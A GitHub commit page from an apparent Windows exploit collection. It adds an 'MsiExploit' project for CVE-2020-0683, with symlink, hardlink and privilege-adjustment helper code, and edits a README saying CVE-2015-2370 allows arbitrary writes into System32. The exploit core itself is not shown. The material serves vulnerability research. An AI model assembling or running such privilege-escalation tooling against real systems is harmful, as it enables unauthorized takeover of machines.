Skip to content

Commit

Permalink
Add a number of numbers:doughnut:
Browse files Browse the repository at this point in the history
  • Loading branch information
Ascotbe committed Jun 27, 2021
1 parent a73adf5 commit d6100ba
Show file tree
Hide file tree
Showing 59 changed files with 7,385 additions and 5 deletions.
2 changes: 1 addition & 1 deletion CVE-2015-2370/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@

- VS2019 Any CPU Release

x64/x86 Windows 7/8.1都可以利用成功,这个漏洞就是可以像任意文件目录写入文件,就比如说我在**c:\windows\system32\\**这个目录没有权限写入文件,但是我可以利用漏洞在这个文件写入文件
x64/x86 Windows 7/8.1都可以利用成功,这个漏洞就是可以像任意文件目录写入文件,就比如说我在**c:\windows\system32\\ **这个目录没有权限写入文件,但是我可以利用漏洞在这个文件写入文件

```
#把桌面的test.txt文件写入到System32文件夹中
Expand Down
31 changes: 31 additions & 0 deletions CVE-2020-0683/CVE-2020-0683/MsiExploit.sln
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.26730.8
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MsiExploit", "MsiExploit\MsiExploit.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD}
EndGlobalSection
EndGlobal
204 changes: 204 additions & 0 deletions CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.cpp
Original file line number Diff line number Diff line change
@@ -0,0 +1,204 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "stdafx.h"
#include "CommonUtils.h"
#include <strsafe.h>
#include "ntimports.h"

void __stdcall my_puts(const char* str)
{
fwrite(str, 1, strlen(str), stdout);
}

static console_output _pout = my_puts;

void DebugSetOutput(console_output pout)
{
_pout = pout;
}

void DebugPrintf(const char* lpFormat, ...)
{
CHAR buf[1024];
va_list va;

va_start(va, lpFormat);

StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);

_pout(buf);
}

std::wstring GetErrorMessage(DWORD dwError)
{
LPWSTR pBuffer = NULL;

DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS |
FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, (LPWSTR)&pBuffer, 32 * 1024, nullptr);

if (dwSize > 0)
{
std::wstring ret = pBuffer;

LocalFree(pBuffer);

return ret;
}
else
{
printf("Error getting message %d\n", GetLastError());
WCHAR buf[64];
StringCchPrintf(buf, _countof(buf), L"%d", dwError);
return buf;
}
}

std::wstring GetErrorMessage()
{
return GetErrorMessage(GetLastError());
}


BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;

if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
return FALSE;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
tp.Privileges[0].Attributes = 0;
}

if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
return FALSE;
}

if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
return FALSE;
}

return TRUE;
}

DWORD NtStatusToDosError(NTSTATUS status)
{
DEFINE_NTDLL(RtlNtStatusToDosError);
return fRtlNtStatusToDosError(status);
}

void SetNtLastError(NTSTATUS status)
{
SetLastError(NtStatusToDosError(status));
}

FARPROC GetProcAddressNT(LPCSTR lpName)
{
return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
}

HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
{
UNICODE_STRING name = { 0 };
OBJECT_ATTRIBUTES obj_attr = { 0 };

DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtOpenFile);

if (path)
{
fRtlInitUnicodeString(&name, path);
InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
}
else
{
InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
}

HANDLE h = nullptr;
IO_STATUS_BLOCK io_status = { 0 };
NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
if (NT_SUCCESS(status))
{
return h;
}
else
{
SetNtLastError(status);
return nullptr;
}
}

std::wstring BuildFullPath(const std::wstring& path, bool native)
{
std::wstring ret;
WCHAR buf[MAX_PATH];

if (native)
{
ret = L"\\??\\";
}

if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
{
ret += buf;
}
else
{
ret += path;
}

return ret;
}

std::wstring GetFileName(const std::wstring& s) {

char sep = '/';

#ifdef _WIN32
sep = '\\';
#endif

size_t i = s.rfind(sep, s.length());
if (i != std::string::npos) {
return(s.substr(i + 1, s.length() - i));
}

return(L"");
}

std::wstring GetDirectoryName(const std::wstring& filename) {

std::wstring directory = L"";
const size_t last_slash_idx = filename.rfind('\\');
if (std::string::npos != last_slash_idx)
{
directory = filename.substr(0, last_slash_idx);
}

return directory;
}
25 changes: 25 additions & 0 deletions CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.h
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
#pragma once

#include <Windows.h>
#include <string>

typedef void(__stdcall *console_output)(const char*);

void DebugSetOutput(console_output pout);
void DebugPrintf(const char* lpFormat, ...);
HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname);
HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname);
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow);
HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname);
std::wstring GetErrorMessage(DWORD dwError);
std::wstring GetErrorMessage();
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile);
bool DeleteRegSymlink(LPCWSTR lpSymlink);
DWORD NtStatusToDosError(NTSTATUS status);
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
bool CreateNativeHardlink(LPCWSTR targetname, HANDLE hFile);
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options);
std::wstring BuildFullPath(const std::wstring& path, bool native);
std::wstring GetFileName(const std::wstring& s);
std::wstring GetDirectoryName(const std::wstring& filename);
Loading

0 comments on commit d6100ba

Please sign in to comment.